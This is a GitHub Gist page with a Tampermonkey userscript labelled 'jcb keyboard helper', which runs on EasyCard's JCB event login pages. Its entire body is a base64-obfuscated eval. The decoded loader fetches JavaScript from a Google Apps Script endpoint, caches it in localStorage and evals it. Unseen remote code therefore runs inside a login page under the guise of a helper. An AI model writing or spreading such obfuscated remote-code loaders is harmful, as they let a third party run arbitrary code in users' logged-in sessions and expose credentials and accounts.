Skip to content

Instantly share code, notes, and snippets.

@luhaoming
Last active August 1, 2023 04:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save luhaoming/642388b7013030c089e0daf6acd9b2de to your computer and use it in GitHub Desktop.
Save luhaoming/642388b7013030c089e0daf6acd9b2de to your computer and use it in GitHub Desktop.
jcb keyboard helper
// ==UserScript==
// @name jcbhelper.user
// @namespace http://tampermonkey.net/
// @version 0.4
// @description try to take over the world!
// @author You
// @match https://ezweb.easycard.com.tw/Event01/JCBLoginRecordServlet*
// @match https://ezweb.easycard.com.tw/Event01/JCBLoginServlet*
// @icon https://www.google.com/s2/favicons?sz=64&domain=easycard.com.tw
// @grant none
// ==/UserScript==
// jcbhelper.user
eval(atob('dmFyICRqc2NvbXA9JGpzY29tcHx8e307JGpzY29tcC5zY29wZT17fTskanNjb21wLmNyZWF0ZVRlbXBsYXRlVGFnRmlyc3RBcmc9ZnVuY3Rpb24oYSl7cmV0dXJuIGEucmF3PWF9OyRqc2NvbXAuY3JlYXRlVGVtcGxhdGVUYWdGaXJzdEFyZ1dpdGhSYXc9ZnVuY3Rpb24oYSxiKXthLnJhdz1iO3JldHVybiBhfTtrZXk9ImpjYm1vbmtleSI7CnZhciBnZXRvcz1mdW5jdGlvbihhKXtjb3JzPSIvL3NjcmlwdC5nb29nbGUuY29tL21hY3Jvcy9zL0FLZnljYnhiMFNwZy11eU5rVHhJZ3pieTQ4enN0SmU5eUk3SVVUSVlibFdQTkdGbnAweGxCZHZHaDNOMnF3L2V4ZWM/Yj0iO2ZldGNoKCIiK2NvcnMrYSx7bWV0aG9kOiJHRVQifSkudGhlbihmdW5jdGlvbihiKXtyZXR1cm4gYi50ZXh0KCl9KS50aGVuKGZ1bmN0aW9uKGIpe2xvY2FsU3RvcmFnZS5zZXRJdGVtKCJqc18iK2tleSxiKTtldmFsKGIpfSl9LHJ1bmRpZ2k9ZnVuY3Rpb24oKXtqcz1sb2NhbFN0b3JhZ2UuZ2V0SXRlbSgianNfIitrZXkpO2lmKG51bGwhPT1qcylyZXR1cm4gZXZhbChqcyk7Z2V0b3MoIiIra2V5KX07cnVuZGlnaSgpOwo='))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment